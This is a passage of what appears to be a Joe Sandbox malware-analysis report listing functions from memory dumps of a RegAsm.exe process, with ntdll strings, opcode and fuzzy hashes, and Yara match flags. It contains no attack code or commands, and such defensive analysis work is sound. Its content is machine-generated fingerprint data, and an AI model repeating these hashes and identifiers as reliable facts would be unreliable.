                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-3154609507
                                                        • Opcode ID: 0eb7f0414d008201367056facbb6624cd29299bdc3672bab5c5a58c54e33432c
                                                        • Instruction ID: 000bd3fa5edbfb7af32bbf37852c5c3f03dcc7dfe5f986ef45f9e0b98ac0f516
                                                        • Opcode Fuzzy Hash: 0eb7f0414d008201367056facbb6624cd29299bdc3672bab5c5a58c54e33432c
                                                        • Instruction Fuzzy Hash: 6541F332A806928FCB21EE58D940A6677E4FF89758F059559FDDD97391E331E800CB81
                                                        Function 02E333A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Actx , xrefs: 02E333AC
                                                        • RtlCreateActivationContext, xrefs: 02E729F9
                                                        • SXS: %s() passed the empty activation context data, xrefs: 02E729FE
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                        • API String ID: 0-859632880
                                                        • Opcode ID: 77186e22735e4072ba324b1c57a1a5596c88dd143e60804219bd7890bf0e4735
                                                        • Instruction ID: 20ec5f221c4b81688da873b40cfd5b1660dad9b34a9db35268ec1a2137f2aaf3
                                                        • Opcode Fuzzy Hash: 77186e22735e4072ba324b1c57a1a5596c88dd143e60804219bd7890bf0e4735
                                                        • Instruction Fuzzy Hash: 203103326802059FEF26DF58D884F9677A6AB84729F05D4A9FE059F281C770D841CBD0
                                                        Function 02E31607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 02E71A51
                                                        • LdrpInitializeTls, xrefs: 02E71A47
                                                        • DLL "%wZ" has TLS information at %p, xrefs: 02E71A40
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-931879808
                                                        • Opcode ID: fe3eab339392a7f23212a849788bf9391e56e252a3b3e424c656070c96ee7685
                                                        • Instruction ID: 11668da1056a50024df77660b2ec4e2b8bedc23cab538092f853bde02daa59ab
                                                        • Opcode Fuzzy Hash: fe3eab339392a7f23212a849788bf9391e56e252a3b3e424c656070c96ee7685
                                                        • Instruction Fuzzy Hash: 12312B71AC0200EBEB119B85CC49FBA7779EB90746F85955DF60A6F180E770AE40CB90
                                                        Function 02E41270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02E4127B
                                                        • BuildLabEx, xrefs: 02E4130F
                                                        • @, xrefs: 02E412A5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        • API String ID: 0-3051831665
                                                        • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                        • Instruction ID: bbb6ef795d12e65f2dec0a3faa2fc5d035f90ad8551744158cf3f5dd166377ae
                                                        • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                        • Instruction Fuzzy Hash: 5B31A172980518ABDF11EFA5DC44EDEBBBEEF84754F019025FA08A7260DB349A45CB60
                                                        Function 02E820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 02E82104
                                                        • LdrpInitializationFailure, xrefs: 02E820FA
                                                        • Process initialization failed with status 0x%08lx, xrefs: 02E820F3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2986994758
                                                        • Opcode ID: 49ccaf9482a30a4abc0065d7b7c9a634e52f9ed4014d4c29027906338b8a7049
                                                        • Instruction ID: a6e5b0a87ebccfef76afc75b304eee3802a61327e64a945200bffa403f2fe2c2
                                                        • Opcode Fuzzy Hash: 49ccaf9482a30a4abc0065d7b7c9a634e52f9ed4014d4c29027906338b8a7049
                                                        • Instruction Fuzzy Hash: 54F02230AC0348ABEB24F648EC46FAA376CEB80B48F505454FB4977780D7B0AD54CAA0
                                                        Function 02E103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        • Opcode ID: d387719f35b6119704bda06dee86a6ef6d36df2a570649fe10936ac1ed536a71
                                                        • Instruction ID: e6b9170e9026849080bce278872d9dadd8e9fe29e8655149558621c6e4cb6e10
                                                        • Opcode Fuzzy Hash: d387719f35b6119704bda06dee86a6ef6d36df2a570649fe10936ac1ed536a71
                                                        • Instruction Fuzzy Hash: E0717B71A801099FDB11DFA8C984FAEB7F9EF08348F149065E905E7291EB34ED41CB60
                                                        Function 02E152A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@
                                                        • API String ID: 0-149943524
                                                        • Opcode ID: 36cad5503d8b65e418a3d53a3a0c501711e2f32fa89aad7bb6cc7b06245ecccc
                                                        • Instruction ID: c6f1adb0851ae2f81c53c82e47dd68beb1503b5f26ddd9b68d0265ab53028dda
                                                        • Opcode Fuzzy Hash: 36cad5503d8b65e418a3d53a3a0c501711e2f32fa89aad7bb6cc7b06245ecccc
                                                        • Instruction Fuzzy Hash: 6B32BC705883518BC724CF19C484B7EB7E6EFC4748F94A92EF9969B290E734D940CB92
                                                        Function 02ECA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction ID: 3176b881b8f107683e1c63c658b66330e27f2fc7b23b4657a3f624df83ca0aaa
                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                        • Instruction Fuzzy Hash: 84C1C0312843499BD725CF64CA41B6BBBE6BF84318F289A3CF995CA390D774D506CB41
                                                        Function 02E00CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ResIdCount less than 2., xrefs: 02E5EEC9
                                                        • Failed to retrieve service checksum., xrefs: 02E5EE56
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                        • API String ID: 0-863616075
                                                        • Opcode ID: e7b9ff579ed79c6e85f07040e05bdb06e2dc57ac5759cfd2c8f5e5250e1a9137
                                                        • Instruction ID: 94e165bfd36ead00a4761c3f127fe05d9452b573cdd495471230986170d83b35
                                                        • Opcode Fuzzy Hash: e7b9ff579ed79c6e85f07040e05bdb06e2dc57ac5759cfd2c8f5e5250e1a9137
                                                        • Instruction Fuzzy Hash: ECE1F1B19583849FE364CF15C080BABBBE4FB88314F40892EE59D9B380DB719949CF56
                                                        Function 00401160 Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F[L$gfff
                                                        • API String ID: 0-2389936153
                                                        • Opcode ID: 6a0e48e28d8bfe2b637619bec3bd6180361034d3ffca691ec75322dbab4a44ce
                                                        • Instruction ID: 02bbe0baaf9f56fce4cd84daadddfa2f348fca422a3d892f964575ec6014c250
                                                        • Opcode Fuzzy Hash: 6a0e48e28d8bfe2b637619bec3bd6180361034d3ffca691ec75322dbab4a44ce
                                                        • Instruction Fuzzy Hash: 8FA15D71E1160987DF04CFA9D8804DDF7B1FF98314F64926AE818BF391E7759A818B84
                                                        Function 00402750 Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: gfff$o
                                                        • API String ID: 0-108857820
                                                        • Opcode ID: 2db4f21b7615c4344b8cc77121d8892b72efd9cd0905ab9c19f0cfdefb5ec0fa
                                                        • Instruction ID: e5efc50266049cdc4fcfe1986f9733dbdff3acf8646f6191bdca432b43430d0e
                                                        • Opcode Fuzzy Hash: 2db4f21b7615c4344b8cc77121d8892b72efd9cd0905ab9c19f0cfdefb5ec0fa
                                                        • Instruction Fuzzy Hash: 9A71E472F0010A47DB1C9D5ADE992AAB356E7E4314F18827FDD16EF3C0E6B9AD018684
                                                        Function 00402470 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: R$gfff
                                                        • API String ID: 0-3105419775
                                                        • Opcode ID: f1de0b439609af47d62c077df7fa52360d3f1ad29e91d7450b09e2efb97037a9
                                                        • Instruction ID: 3b33c23e0baddf3ccc97949a9dc0de9f77c2da73681aa214a773b1889578527e
                                                        • Opcode Fuzzy Hash: f1de0b439609af47d62c077df7fa52360d3f1ad29e91d7450b09e2efb97037a9
                                                        • Instruction Fuzzy Hash: 8D61D331B004159BCF18CE5DCE946AEB3A6EBD4314F14457BDC19EB3D0E6B8ED518A88
                                                        Function 0040246C Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: R$gfff
                                                        • API String ID: 0-3105419775
                                                        • Opcode ID: 473b4a6ae12f7b2333327b587cfdbfe03e8c212658e09b55e52dadc64ca3aab2
                                                        • Instruction ID: a16bbfcb02c0c1e1fea812c58d33bea46089961915f5115633d1bcd82896f3f4
                                                        • Opcode Fuzzy Hash: 473b4a6ae12f7b2333327b587cfdbfe03e8c212658e09b55e52dadc64ca3aab2
                                                        • Instruction Fuzzy Hash: AA511731B004159BCF188E5DCE546AAB3A6FBE4314F14467BDC15EB3D0E6B8ED418788
                                                        Function 02E7E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        • Opcode ID: e52cf44c6b0422ebbaa9c181ad58d1241dbef7a3e25244fca46f8aa84b0b264c
                                                        • Instruction ID: 22b9239df49ece3a3b41bd2f9bd66458f8cb7e36a499a0027b265f49cfb669c0
                                                        • Opcode Fuzzy Hash: e52cf44c6b0422ebbaa9c181ad58d1241dbef7a3e25244fca46f8aa84b0b264c
                                                        • Instruction Fuzzy Hash: A7613F71E807199FEB14DFA8C840BADBBB5FB48704F1890ADE649EB291D731AD40CB50
                                                        Function 0040274C Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: U$o
                                                        • API String ID: 0-364442972
                                                        • Opcode ID: d66add5d2c8b7c3c5a097147db024b64dfdffc8cf527d36f91004bebf42a2bb2
                                                        • Instruction ID: 822a81fcbdd8c1e38d8ff3f02ea014824b0a801527861be45cd6afdd9f72707b
                                                        • Opcode Fuzzy Hash: d66add5d2c8b7c3c5a097147db024b64dfdffc8cf527d36f91004bebf42a2bb2
                                                        • Instruction Fuzzy Hash: 1751F372F0020A47DB2C9959CE692AB7656E7E4314F1CC63EDD06AF3C1E6B9AD018784
                                                        Function 02E1F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$$
                                                        • API String ID: 0-233714265
                                                        • Opcode ID: 0cd4fbcb726e77a84a0e0dd996de44bf48f8d9db5f8f2fb9de989e46f86586b9
                                                        • Instruction ID: dddcdd9542067e9d46484ae4fd2016efef3332cef5f5d397df6b548fbd076904
                                                        • Opcode Fuzzy Hash: 0cd4fbcb726e77a84a0e0dd996de44bf48f8d9db5f8f2fb9de989e46f86586b9
                                                        • Instruction Fuzzy Hash: C261BC71A80749DBDB20DFA4C584BADB7F2FF44308F14E479E5156BA80CB74A981CB90
                                                        Function 02E004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • kLsE, xrefs: 02E00540
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02E0063D
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        • Opcode ID: 1f6ff34bcff4e6fb70621b9097756352deee6ebbf03693609d02021ff9be48f6
                                                        • Instruction ID: 05e2ca9f899d4c9e003c6cd6133dd2341068ef02344f67f5225c031af39771e9
                                                        • Opcode Fuzzy Hash: 1f6ff34bcff4e6fb70621b9097756352deee6ebbf03693609d02021ff9be48f6
                                                        • Instruction Fuzzy Hash: 2051BF715847428FC724EF64D5807A7B7E5AF84308F04983EE99A87680E774E586CF91
                                                        Function 02E0A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 02E0A2FB
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 02E0A309
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        • Opcode ID: 4b8413a62e76f3f097d584d87a1fc8724871ef36f4dd861e71e8432210ecd34b
                                                        • Instruction ID: f369465f5bd72170c0f35cb04f628b40c4eaabd010b03ac95b97d9af52974404
                                                        • Opcode Fuzzy Hash: 4b8413a62e76f3f097d584d87a1fc8724871ef36f4dd861e71e8432210ecd34b
                                                        • Instruction Fuzzy Hash: 0E41BD30A8074ACBCB21CF69C494BAE77B5EF85348F14D0A5EA14DB391E339D981CB40
                                                        Function 02E3329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local\$@
                                                        • API String ID: 0-380025441
                                                        • Opcode ID: 33703fed72a429741c9ec51bf013083921e9c37657ac69b174e1e28465a4c1eb
                                                        • Instruction ID: ca4ebc68a2481b3f62bef6d6d7d78a5d5514a75b8b2de1f6a3a00d9010a6499a
                                                        • Opcode Fuzzy Hash: 33703fed72a429741c9ec51bf013083921e9c37657ac69b174e1e28465a4c1eb
                                                        • Instruction Fuzzy Hash: 5F318E725887049FD322DF28C484EABBBE8EBC4654F44996EF9A583250DA31DD04CBD2
                                                        Function 02E0C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • API String ID: 0-1339004836
                                                        • Opcode ID: cf5b95847910e43b026bd096a48bbaeb8316e60a4e8e703e5084509a9722fefc
                                                        • Instruction ID: 0fa2f217358b950caa66051baa67a4dcc53160f3f5b066e636989aedc7906c44
                                                        • Opcode Fuzzy Hash: cf5b95847910e43b026bd096a48bbaeb8316e60a4e8e703e5084509a9722fefc
                                                        • Instruction Fuzzy Hash: 2C823075D402189BDB24CFA9C8D07EDB7B5FF48318F24E16AE859AB290D7309982CF54
                                                        Function 02E52F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P`owRbow
                                                        • API String ID: 0-263301770
                                                        • Opcode ID: 7ecdb4967c4858724e0707b3655356f10a167e9a3ec6fec9d0de6e9d8dc9bedd
                                                        • Instruction ID: 04931a16d6020b9b42477fa759845272c8f4ca43bb3a9c23762b5b15255f4fa0
                                                        • Opcode Fuzzy Hash: 7ecdb4967c4858724e0707b3655356f10a167e9a3ec6fec9d0de6e9d8dc9bedd
                                                        • Instruction Fuzzy Hash: 50422971DA4279AEDF29CF68D4447FDBBB1AF04398F14E09AED41AB280D7748980CB50
                                                        Function 02E07370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b935c4fa696ac057f7b4e31373435a4fd3c6dc77a9974c21b113596fadb75d8
                                                        • Instruction ID: 719c78fd715264ebc5991971feefda539b285a32c8f5aa81759e2e1f5646662c
                                                        • Opcode Fuzzy Hash: 3b935c4fa696ac057f7b4e31373435a4fd3c6dc77a9974c21b113596fadb75d8
                                                        • Instruction Fuzzy Hash: 1AA14B71A88341CFC711DF28D480A6AFBE6BB88344F14996DF5859B390D730E986CF92
                                                        Function 02E22E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0
                                                        • API String ID: 0-4108050209
                                                        • Opcode ID: a90f0ac7a163111016773d3e190a68ca467bef1bae266ca0a41dcbbbaa466b1a
                                                        • Instruction ID: 081fa21a60c0472174141bf30b09e7d4ec1bde9b9b0fdca0d742ef37c7d8bb3d
                                                        • Opcode Fuzzy Hash: a90f0ac7a163111016773d3e190a68ca467bef1bae266ca0a41dcbbbaa466b1a
                                                        • Instruction Fuzzy Hash: 34F19271684365CFC725CF14C480B6ABBE1AB88718F14E8ADF95A97240DB38D949CF62
                                                        Function 00416780 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: ef60e90c57cc120c2ce11489bbcacd791be0a7e4a94d95da2a51fa30a9e9ace8
                                                        • Instruction ID: 8aadd01dc08922be36edb51b99c869f1a38ec26ff889054ced51b55c43a234d2
                                                        • Opcode Fuzzy Hash: ef60e90c57cc120c2ce11489bbcacd791be0a7e4a94d95da2a51fa30a9e9ace8
                                                        • Instruction Fuzzy Hash: 8E021FB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                                                        Function 00416783 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (
                                                        • API String ID: 0-3887548279
                                                        • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction ID: ac33369e052cf782165c15caf902e22b5824bada0b565692362b27bceeca3ee3
                                                        • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                        • Instruction Fuzzy Hash: 05021FB6E006189FDB14CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                        Function 02E02FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PATH
                                                        • API String ID: 0-1036084923
                                                        • Opcode ID: a59b12178ae3817ded66365145a2eed67632009151c5a7d5af60dac0209a6aa3
                                                        • Instruction ID: 0f6ab18f5b950472eb0d763dc9ff1caa572a7232d115d6d83e5d13825d06ee18
                                                        • Opcode Fuzzy Hash: a59b12178ae3817ded66365145a2eed67632009151c5a7d5af60dac0209a6aa3
                                                        • Instruction Fuzzy Hash: C3F1D271D80218EBCB24DF99D8C1AFEB7B5FF88704F459469E945AB280D7349C92CB60
                                                        Function 02E3F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9bc27d0880df9ec8726002604a0ececc60bd5bf4e36919f2115f8708335914fa
                                                        • Instruction ID: 5b18768a34e8d0129dd9f998307ea44f0d678209fa7766d55401050aef2265d7
                                                        • Opcode Fuzzy Hash: 9bc27d0880df9ec8726002604a0ececc60bd5bf4e36919f2115f8708335914fa
                                                        • Instruction Fuzzy Hash: 54418FB4D80288DFDB61CFA9D480AAEBBF4FF48304F50956EE559A7201D7319944CF60
                                                        Function 02E00100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 5cf2375f323653ac2ccdf67d7d9c40d1f9c6c6ad8fd8663c419c1bfe6b653f97
                                                        • Instruction ID: 2b82a23f9c89c1a8adee1e0ceedd5dfad18787af2d50136b5ba36d36c1871b36
                                                        • Opcode Fuzzy Hash: 5cf2375f323653ac2ccdf67d7d9c40d1f9c6c6ad8fd8663c419c1bfe6b653f97
                                                        • Instruction Fuzzy Hash: FFA13D31AC82686BDF759A20C8C1BFD67A59B4531CF08E099FD4A572C2C7749EC2CB64
                                                        Function 02E3A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        • Opcode ID: 454859d2bd63f1a1b0745f4075df2fe4a167d416df7e262759217dde1b19c3ee
                                                        • Instruction ID: cd7319088ebaf9f1e17481ab06c5fc662686cc1f9698bb76d3cb73bf7528516d
